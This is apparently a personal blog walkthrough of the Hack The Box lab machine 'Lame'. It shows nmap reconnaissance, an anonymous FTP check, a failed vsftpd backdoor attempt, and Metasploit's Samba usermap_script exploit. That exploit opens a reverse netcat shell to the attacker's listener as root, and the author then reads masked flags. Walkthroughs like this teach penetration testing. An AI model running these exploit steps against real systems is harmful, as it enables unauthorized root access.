Lame has been Pwned!

Hack The Box Lame Banner

I’m back once again doing Hack The Box machines. I have recently hacked all the Starting Point machines and am now moving on to the Beginner track. I’ve written a post on my experience with the Starting Point machine which you can read here

Reconnaissance

The name of the machine I’m going to be looking at today and the first machine in the Beginner Track is Lame. As always, we start by checking to see whether the box is online and responding to pings.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ping 10.129.81.166 | tee -a ping ping.lame.txt
[sudo] password for joe:
PING 10.129.81.166 (10.129.81.166) 56(84) bytes of data.
64 bytes from 10.129.81.166: icmp_seq=1 ttl=63 time=21.4 ms
64 bytes from 10.129.81.166: icmp_seq=2 ttl=63 time=20.4 ms

As you can see, the box is responding which means it’s safe to go ahead and run an nmap scan. I tell nmap to run safe checks, version checks and operating system identification on all ports. You can see the specific command and the output below.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.129.81.166 | tee -a nmap.lame.txt
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.84
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-09-15T14:40:20-04:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 40068/tcp): CLEAN (Timeout)
|   Check 2 (port 45806/tcp): CLEAN (Timeout)
|   Check 3 (port 54683/udp): CLEAN (Timeout)
|   Check 4 (port 34973/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h59m26s, deviation: 2h49m56s, median: -43s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.

I’ve snipped out a bunch of the stuff we don’t need to see and have highlighted the areas which I think are of interest. Going down the lists of results I see that port 21 (FTP) is open and is allowing anonymous logins. The first thing I did was to login and check to see whether there were any files on there.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ftp 10.129.81.166
Connected to 10.129.81.166.
220 (vsFTPd 2.3.4)
Name (10.129.81.166:joe): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

As you can see, there wasn’t anything interesting. I know that VSFTPD 2.3.4 has CVE-2011-2523 associated with it which is a backdoor. The backdoor requires the user to login with a smiley face and it grants them access. I attempted to do this but had no luck. I used the Metasploit module but that didn’t work so I it’s safe to say it’s patched. Moving on.

Foothold Hack

So from here we move on to the next port in the list, 138 and 445 (Samba). I can see that version of Samba is 3.0.20 let’s check SearchSploit to see whether there are any known vulnerabilities for this particular version.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo searchsploit Samba 3.0.20
------------------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                                                      | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                            | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                       | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                       | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                                               | linux_x86/dos/36741.py
------------------------------------------

As you can see from the snippet of code above, it looks like there is a command execution vulnerability and that there is a Metasploit module for. Let’s launch Metasploit (using msfconsole) and see if we can find and use the module.

msf6 > search samba 3.0.20
Matching Modules
================
   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Ok we have found the exploit, we can select it by running ‘use 0’. Once we have the module loaded we can run ‘options’ to see what we need to populate the options with.

sf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.129.81.166    yes       The target host(s), range CIDR identifier, 
   RPORT   139              yes       The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.84      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:

   Id  Name
   --  ----
   0   Automatic

It looks like we only have to set the RHOSTS option. The RHOSTS option is the setting you use to declare the IP address of the remote host. The RPORT is the remote port, as you can see it is targeting port 139. The LHOST and LPORT options are our localhost IP and port that we want the machine to connect back to. With all that configured, let’s run the ‘exploit’ command and see if it creates a session.

 msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.84:4444 
[*] Command shell session 1 opened (10.10.14.84:4444 -> 10.129.81.166:34291) at 2021-09-15 20:06:43 +0100
whoami
root

Hallelujah, praise the hack gods. Metasploit successfully created a session on the remote machine and not only that but it looks like we are root too. That means no privilege escalation is required on this machine. Let’s grab the root flag.

cat /root/root.txt
f40--------haXez--------712

We still have to submit the user flag so we need to go hunting for it. Let’s check home directory and see if there are any users and whether any of them is hiding the user flag.

ls /home
ftp
makis
service
user
ls /home/makis
user.txt
cat /home/makis/user.txt
8af--------haXez--------3fb
Hack The Box Lame has been Pwned!
Lame has been Pwned!
%d bloggers like this: